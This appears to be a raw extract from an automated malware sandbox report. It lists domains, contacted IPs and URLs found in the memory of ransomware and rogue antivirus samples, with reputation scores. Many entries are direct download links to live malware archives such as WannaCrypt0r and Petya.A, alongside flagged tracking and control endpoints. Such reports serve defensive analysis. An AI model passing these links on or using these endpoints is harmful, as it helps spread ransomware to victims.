          http://searchdusty.com/avt/avt.dat5%VirustotalBrowse
          http://192.168.2.10%Avira URL Cloudsafe
          http://78.159.97.210/sw/log.php?v=31&aff_id=1&wm_id=46&u=5e4ec3dc-28c4-4007-bc6e-6b2c6debcd29&os=10.0.17134.256.1.9.0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip0%Avira URL Cloudsafe
          http://searchdusty.com/avt/avt_dbmy100%Avira URL Cloudmalware
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zip0%Avira URL Cloudsafe
          http://wallup.nethttp://wallup.nethttp://wallup.net0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zip0%Avira URL Cloudsafe
          http://192.168.2.1/0%Avira URL Cloudsafe
          http://searchdusty.com/100%Avira URL Cloudmalware
          http://searchdusty.com/avt/avt.dat100%Avira URL Cloudmalware
          http://www.vikingwebscanner.com/scripts/new_install.php?owner=0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip0%Avira URL Cloudsafe
          http://powertoolsforyou.com/themes/prestashop/cache/stats.php100%Avira URL Cloudmalware
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip0%Avira URL Cloudsafe
          http://78.159.97.210/sw/l.php?aff_id=1&wm_id=46&u=4d79e664-726f-48c9-9669-374112d48b6d&log_id=16&os=6.2.9200.256.1.9.0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/VAV2008.zip0%Avira URL Cloudsafe
          http://78.159.97.210/sw/log.php?v=31&aff_id=1&wm_id=46&u=5e4ec3dc-28c4-4007-bc6e-6b2c6debcd29&os=6.2.9200.256.1.9.0%Avira URL Cloudsafe
          http://www.vikingwebscanner.com/scripts/paymore.php0%Avira URL Cloudsafe
          http://www.vikingwebscanner.com/scripts/new_install.php?owner=6AdwCleaner0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip0%Avira URL Cloudsafe
          http://78.159.97.210/sw/l.php?aff_id=1&wm_id=46&u=5e4ec3dc-28c4-4007-bc6e-6b2c6debcd29&log_id=12&os=10.0.17134.256.1.9.0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/NavaShield.zip0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip0%Avira URL Cloudsafe
          http://checkeds.com/customers/installer.php?pid=AVT_BASIC0%Avira URL Cloudsafe
          http://www.vikingwebscanner.com/scripts/status.php?action=0%Avira URL Cloudsafe
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip0%Avira URL Cloudsafe
          http://searchdusty.com/avt/avt_db100%Avira URL Cloudmalware
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zip0%Avira URL Cloudsafe
          http://highway-traffic.com/avt/avt_db0%Avira URL Cloudsafe
          http://searchdusty.com/avt/avt_dbst7100%Avira URL Cloudmalware
          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          yandex.ru
          5.255.255.80
          truefalse
            high
            github.com
            140.82.121.3
            truefalse
              high
              raw.githubusercontent.com
              185.199.108.133
              truefalse
                high
                google.ru
                172.217.168.67
                truefalse
                  high
                  www.vikingwebscanner.com
                  185.53.177.53
                  truefalse
                    high
                    arizonacode.bplaced.net
                    162.55.0.137
                    truefalse
                      high
                      searchdusty.com
                      37.187.79.168
                      truefalse
                        high
                        frequentwin.com
                        unknown
                        unknownfalse
                          high
                          highway-traffic.com
                          unknown
                          unknownfalse
                            high
                            fastsofgeld.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zipfalse
                                high
                                https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zipfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zipfalse
                                  high
                                  https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Central.zipfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zipfalse
                                    high
                                    https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zipfalse
                                      high
                                      http://searchdusty.com/avt/avt.datfalse
                                      • 5%, Virustotal, Browse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zipfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://78.159.97.210/sw/log.php?v=31&aff_id=1&wm_id=46&u=5e4ec3dc-28c4-4007-bc6e-6b2c6debcd29&os=10.0.17134.256.1.9.false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zipfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zipfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender.zipfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Krotten.zipfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender%202015.zipfalse
                                        high
                                        https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zipfalse
                                          high
                                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/PC%20Defender%20v2.zipfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://yandex.ru/1001false
                                            high
                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Movie.mpeg.zipfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Security%20Defender%202015.zipfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zipfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zipfalse
                                              high
                                              https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/SecurityScanner.zipfalse
                                                high
                                                http://powertoolsforyou.com/themes/prestashop/cache/stats.phpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zipfalse
                                                  high
                                                  https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zipfalse
                                                    high
                                                    https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zipfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zipfalse
                                                      high
                                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/RegistrySmart.zipfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/VAV2008.zipfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://78.159.97.210/sw/l.php?aff_id=1&wm_id=46&u=4d79e664-726f-48c9-9669-374112d48b6d&log_id=16&os=6.2.9200.256.1.9.false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://78.159.97.210/sw/log.php?v=31&aff_id=1&wm_id=46&u=5e4ec3dc-28c4-4007-bc6e-6b2c6debcd29&os=6.2.9200.256.1.9.false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.vikingwebscanner.com/scripts/new_install.php?owner=6AdwCleanertrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zipfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zipfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/NavaShield.zipfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zipfalse
                                                        high
                                                        http://78.159.97.210/sw/l.php?aff_id=1&wm_id=46&u=5e4ec3dc-28c4-4007-bc6e-6b2c6debcd29&log_id=12&os=10.0.17134.256.1.9.false
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zipfalse
                                                          high
                                                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zipfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zipfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://searchdusty.com/avt/avt_dbfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/InternetSecurityGuard.zipfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zipfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://google.com/false
                                                            high
                                                            https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Security%20Defender.zipfalse
                                                              high
                                                              https://github.com/Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zipfalse
                                                                high
                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000005.00000002.314975708.0000017D5843E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://dev.ditu.live.com/REST/v1/Traffic/Incidents/svchost.exe, 00000005.00000002.315152444.0000017D5845D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000005.00000002.315090593.0000017D5844F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314153614.0000017D58446000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314438636.0000017D58448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://192.168.2.1rundll32.exe, 00000016.00000002.472917726.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • 0%, Virustotal, Browse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000005.00000003.314062831.0000017D58461000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.torproject.org/downlo&#097;d/download-easy.html.enEndermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.torproject.org/Endermanch@Cerber5.exe, 00000017.00000003.463681172.00000000050EA000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 00000017.00000003.397567876.00000000050D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://searchdusty.com/avt/avt_dbmyEndermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            https://www.youtube.comEndermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://yastatic.net/s3/home-static/_/2/j/mj7l5rSw0yVb_vlWAYkK_YBwk.cssavpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.314910686.0000017D5842A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://yastatic.net/s3/home-static/_/a6/a6a296b741b51880ae8a9b04a67cfe3f.pngavpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://wallup.nethttp://wallup.nethttp://wallup.netEndermanch@DeriaLock.exe, 0000001E.00000000.393866499.0000000000872000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000005.00000002.315003924.0000017D58443000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314270382.0000017D58441000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.vikingwebscanner.com/scripts/new_install.php?owner=Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000036.00000000.446677741.0000000000A22000.00000002.00000001.01000000.00000025.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://yastatic.net/s3/home-static/_/k/z/KVcAdY4g9KYsFy1_kLM5XFnfc.cssavpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://192.168.2.1/rundll32.exe, 00000016.00000002.465407498.0000000000B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.472917726.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.539681457.0000000004652000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://searchdusty.com/Endermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        http://www.clamav.netavpc2009.exe, 0000001A.00000000.386279142.0000000000516000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                          high
                                                                                          https://auto.ru/?from=morda&utm_source=yandex_list_service&utm_medium=cpm&utm_campaign=yls_r10000_tiavpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.422769367.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.bingmapsportal.comsvchost.exe, 00000005.00000002.314750739.0000017D58413000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000005.00000002.314910686.0000017D5842A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://yastatic.net/s3/home-static/_/f0/f0597b6727cc67dceebc4e3a87caf571.pngavpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://diskcryptor.net/rundll32.exe, 00000016.00000003.391522573.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.408744646.00000000045A1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000016.00000002.472917726.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.432023406.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000016.00000003.410488434.0000000000BA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.vikingwebscanner.com/scripts/paymore.phpEndermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000036.00000000.446677741.0000000000A22000.00000002.00000001.01000000.00000025.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://yastatic.net/s3/home-static/_/a7/a79b81aa025e9edb2244e38581c868ad.pngavpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000003.314153614.0000017D58446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://gnuwin32.sourceforge.netEndermanch@AnViPC2009.exe, 00000011.00000003.380540315.00000000025D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://bugs.clamav.netavpc2009.exe, 0000001A.00000000.386279142.0000000000516000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                                                            high
                                                                                                            https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000005.00000002.314975708.0000017D5843E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8Endermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://wallup.netEndermanch@DeriaLock.exe, 0000001E.00000000.393866499.0000000000872000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                  high
                                                                                                                  http://nsis.sf.net/NSIS_ErrorErrorEndermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe, 00000023.00000000.408184586.0000000000409000.00000008.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drfalse
                                                                                                                    high
                                                                                                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000005.00000002.314750739.0000017D58413000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.314975708.0000017D5843E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000005.00000003.314062831.0000017D58461000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://google.ru/Kavpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000005.00000003.291362782.0000017D58432000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://arizonacode.bplaced.net/HF/SystemLocker/unlock-everybody.txtEndermanch@DeriaLock.exe, 0000001E.00000000.395625850.00000000008B6000.00000002.00000001.01000000.00000018.sdmpfalse
                                                                                                                              high
                                                                                                                              https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000005.00000002.315152444.0000017D5845D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://nsis.sf.net/NSIS_ErrorEndermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe, 00000023.00000000.408184586.0000000000409000.00000008.00000001.01000000.00000019.sdmp, Endermanch@FakeAdwCleaner.exe.0.drfalse
                                                                                                                                  high
                                                                                                                                  http://checkeds.com/customers/installer.php?pid=AVT_BASICEndermanch@Antivirus.exe, 0000000E.00000000.354486231.00000000004AE000.00000002.00000001.01000000.00000008.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://dynamic.tsvchost.exe, 00000005.00000003.314438636.0000017D58448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://yastatic.net/s3/home-static/_/37/37a02b5dc7a51abac55d8a5b6c865f0e.pngavpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://www.vikingwebscanner.com/scripts/status.php?action=Endermanch@FakeAdwCleaner.exe, 00000023.00000002.450580371.0000000000409000.00000004.00000001.01000000.00000019.sdmp, 6AdwCleaner.exe, 00000036.00000000.446677741.0000000000A22000.00000002.00000001.01000000.00000025.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000005.00000003.314062831.0000017D58461000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://ogp.me/ns#avpc2009.exe, 0000001A.00000003.418671263.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.419965518.00000000059D3000.00000004.00000800.00020000.00000000.sdmp, avpc2009.exe, 0000001A.00000003.423102767.00000000059F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://dr.yandex.net/nelavpc2009.exe, 0000001A.00000003.419411879.00000000059BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://highway-traffic.com/avt/avt_dbEndermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          https://www.youtube.com/results?search_query=InstallEndermanch@Cerber5.exe, 00000017.00000003.460533758.00000000050F5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000002.315152444.0000017D5845D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://searchdusty.com/avt/avt_dbst7Endermanch@Antivirus.exe, 0000000E.00000003.493475072.00000000008B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              unknown
                                                                                                                                              https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000005.00000002.315152444.0000017D5845D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000005.00000003.314091621.0000017D5845B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.happyantivirus.co.cc/register.htmlEndermanch@HappyAntivirus.exe, 00000028.00000000.427256205.0000000000D78000.00000002.00000001.01000000.0000001B.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    87.98.177.219
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.218
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.215
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.214
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.217
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.216
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.211
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.210
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.213
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.212
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.208
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.207
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.209
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.204
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.203
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.206
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.205
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.200
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.202
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.201
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.2
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.1
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.4
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.3
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.0
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.9
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.6
                                                                                                                                                    unknownFrance
                                                                                                                                                    16276OVHFRfalse
                                                                                                                                                    87.98.177.5
                                                                                                                                                    unknownFrance
